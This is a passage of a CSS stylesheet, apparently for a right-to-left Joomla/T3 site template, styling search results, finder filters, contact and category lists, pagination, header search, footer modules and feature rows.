#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-right: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
div.finder .input-group {
  display: flex;
}
div.finder .input-group input {
  flex: 1;
}
div.finder .com-finder__tips {
  margin-top: 20px;
}
#finder-filter-window {
  margin-top: 20px;
}
#finder-filter-window #finder-filter-select-dates {
  display: grid;
  grid-template-columns: 1fr;
  gap: 10px;
  margin-bottom: 40px;
}
@media screen and (min-width: 1200px) {
  #finder-filter-window #finder-filter-select-dates {
    grid-template-columns: repeat(2, 1fr);
  }
}
#finder-filter-window #finder-filter-select-dates .filter-date {
  display: flex;
  flex-wrap: wrap;
  padding: 0;
  gap: 10px;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date label {
  flex-basis: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date select.inputbox {
  margin: 0;
  width: 100% !important;
  max-width: unset;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar {
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar .form-control {
  flex: 1;
  max-width: unset;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .chzn-container {
  margin-bottom: 6px;
}
#finder-filter-window #finder-filter-select-dates .filter-date br {
  display: none;
}
#finder-filter-window .filter-branch {
  display: flex;
  flex-wrap: wrap;
  flex-direction: column;
  gap: 10px;
  width: 100%;
}
@media (min-width: 1200px) {
  #finder-filter-window .filter-branch {
    flex-direction: row;
  }
}
#finder-filter-window .filter-branch .control-label {
  padding: 0;
  margin-bottom: 10px;
}
#finder-filter-window .filter-branch .controls {
  margin-right: 0;
}
#finder-filter-window .filter-branch .controls select {
  color: #9e9e9e;
  width: 100%;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-right: 0;
}
.contact .thumbnail {
  padding: 4px;
}
.contact dd::after {
  display: none;
}
.contact .icon-address::before {
  content: '\f02d';
}
.contact .icon-fax::before {
  content: '\f109';
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.contact-category ul.category {
  border-top: 0;
  overflow: hidden;
}
.contact-category ul.category li.row-fluid {
  border: 1px solid #eeeeee;
  width: 100%;
  margin-left: 0;
  margin-right: 0;
}
.contact-category ul.category li.row-fluid:before,
.contact-category ul.category li.row-fluid:after {
  display: table;
  content: " ";
}
.contact-category ul.category li.row-fluid:after {
  clear: both;
}
.contact-category ul.category li.row-fluid > div {
  margin: 0;
}
.contact-category .cat-children ul {
  border: 0;
  border-top: 1px solid #eeeeee;
}
.contact-category .cat-children ul li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 5px 0 5px 0;
}
.contact-category .cat-children ul li h4 {
  border-right: 1px dotted #999999;
  font-size: 14px;
  font-weight: 600;
  padding: 0;
  padding-right: 15px;
  margin-right: 20px;
  position: relative;
}
.contact-category .cat-children ul li h4:after {
  border-top: 1px dotted #999999;
  display: block;
  content: "";
  position: absolute;
  right: 0;
  top: 8px;
  height: 1px;
  width: 10px;
}
.contact-category .cat-children ul li li h4 {
  margin-right: 40px;
}
.contact-category .cat-children ul li li li h4 {
  margin-right: 60px;
}
.contact-category .cat-children ul li li li li h4 {
  margin-right: 80px;
}
.contact-category .cat-children ul li:last-child {
  border: 0;
}
.category-item:before,
.category-item:after {
  display: table;
  content: " ";
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-right: 40px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  display: table;
  content: " ";
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-right: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: right;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-right: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 20px 20px 0;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #0077bb;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #0077bb;
  color: #ffffff;
}
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;
}
.pagenavigation ul.pagination > li,
.pagenav > li {
  margin: 0;
  padding: 0;
  float: right;
}
.pagenavigation ul.pagination > li.pagenav-prev,
.pagenav > li.pagenav-prev,
.pagenavigation ul.pagination > li.previous,
.pagenav > li.previous {
  margin-left: 10px;
}
.pagenavigation ul.pagination > li.pagenav-next,
.pagenav > li.pagenav-next,
.pagenavigation ul.pagination > li.next,
.pagenav > li.next {
  margin-right: auto;
}
.pagenavigation ul.pagination li > a,
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0;
}
.pagenavigation ul.pagination li > a:hover,
.pagenav li > a:hover,
.pagenavigation ul.pagination li > a:active,
.pagenav li > a:active,
.pagenavigation ul.pagination li > a:focus,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: left;
  text-align: left;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 0 0 5px;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: left;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: left;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  display: table;
  content: " ";
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-left: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #00466e;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 3px 0 0 3px;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 3px 0 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}
.js-stools-container-filters .js-stools-field-filter .chzn-single,
.js-stools-container-filters .js-stools-field-filter .chzn-drop {
  border-radius: 0;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn {
  width: auto !important;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn ul li input {
  width: 208px !important;
  height: 24px !important;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-right: 20px;
}
#glossary-detail .modal-dialog {
  height: 100vh;
  position: relative;
}
#glossary-detail .modal-content {
  padding: 24px;
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
}
#glossary-detail .modal-content .modal-header {
  flex-direction: row-reverse;
  justify-content: space-between;
  padding: 0 0 24px;
}
#glossary-detail .modal-content .modal-header::after,
#glossary-detail .modal-content .modal-header::before {
  display: none;
}
#glossary-detail .modal-content .modal-header .close {
  padding: 6px 10px;
  background-color: #005788;
  color: #fff;
  opacity: 1;
  transition: all 0.3s ease-in-out;
}
#glossary-detail .modal-content .modal-header .close:hover {
  opacity: .7;
}
#glossary-detail .modal-content .modal-body {
  margin-top: 24px;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  display: table;
  content: " ";
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  display: table;
  content: " ";
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #0077bb;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #bbe6ff;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  display: table;
  content: " ";
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-right: 0;
  padding-left: 0;
}
@media screen and (max-width: 991px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-right: 20px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
.label {
  border-radius: 0;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-left: 10px;
}
.media > .pull-right {
  margin-right: 10px;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #88d4ff;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
.modal-body iframe {
  width: 100%;
  max-height: none;
  border: 0 !important;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  right: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #0067a2;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #0067a2;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  right: 55px;
  border-right: 1px solid #0067a2;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-right: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  left: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #0077bb;
  border-right: 1px solid #0067a2;
  border-left: 1px solid #0067a2;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #0067a2;
  }
}
.head-search .search .fa-search {
  color: #bbe6ff;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  right: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #bbe6ff;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 40px 10px 15px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 1000px 0 0 #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.head-search .mod-finder input {
  z-index: 10;
}
.head-search .mod-finder > .awesomplete {
  position: relative;
}
.head-search .mod-finder > .awesomplete::after {
  content: '\f002';
  color: #bbe6ff;
  display: inline-block;
  font-family: "FontAwesome";
  height: 16px;
  width: 16px;
  position: absolute;
  top: 19px;
  margin-right: 20px;
}
.head-search .mod-finder .mod-finder__search input {
  width: 100px;
  padding: 10px 15px;
}
@media screen and (max-width: 576px) {
  .head-search .mod-finder .mod-finder__search input {
    width: 50px;
  }
}
.head-search .mod-finder .mod-finder__search input:focus {
  width: 200px;
}
.navbar-toggle + .head-search {
  left: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    left: 20px;
    top: 0;
    max-width: none;
  }
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-spotlight {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
@media screen and (max-width: 767px) {
  .t3-spotlight > div {
    margin-bottom: 20px;
  }
}
@media screen and (min-width: 992px) {
  .t3-spotlight:not(:root:root) .col-md-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-md-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-md-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-md-12 {
    width: 100%;
  }
}
@media screen and (max-width: 991px) {
  .t3-spotlight:not(:root:root) .col-sm-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-sm-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-sm-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-sm-12 {
    width: 100%;
  }
}
@media screen and (max-width: 767px) {
  .t3-spotlight:not(:root:root) .col-xs-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-xs-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-xs-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-xs-12 {
    width: 100%;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (max-width: 767px) {
  .t3-sl {
    padding-bottom: 20px;
    padding-top: 20px;
  }
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  display: table;
  content: " ";
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  display: table;
  content: " ";
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-right: 0;
  margin-bottom: 0;
  padding-right: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  left: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  display: table;
  content: " ";
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  display: table;
  content: " ";
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: left;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #0077bb;
  color: #bbe6ff;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #bbe6ff;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #005788;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  right: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  right: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
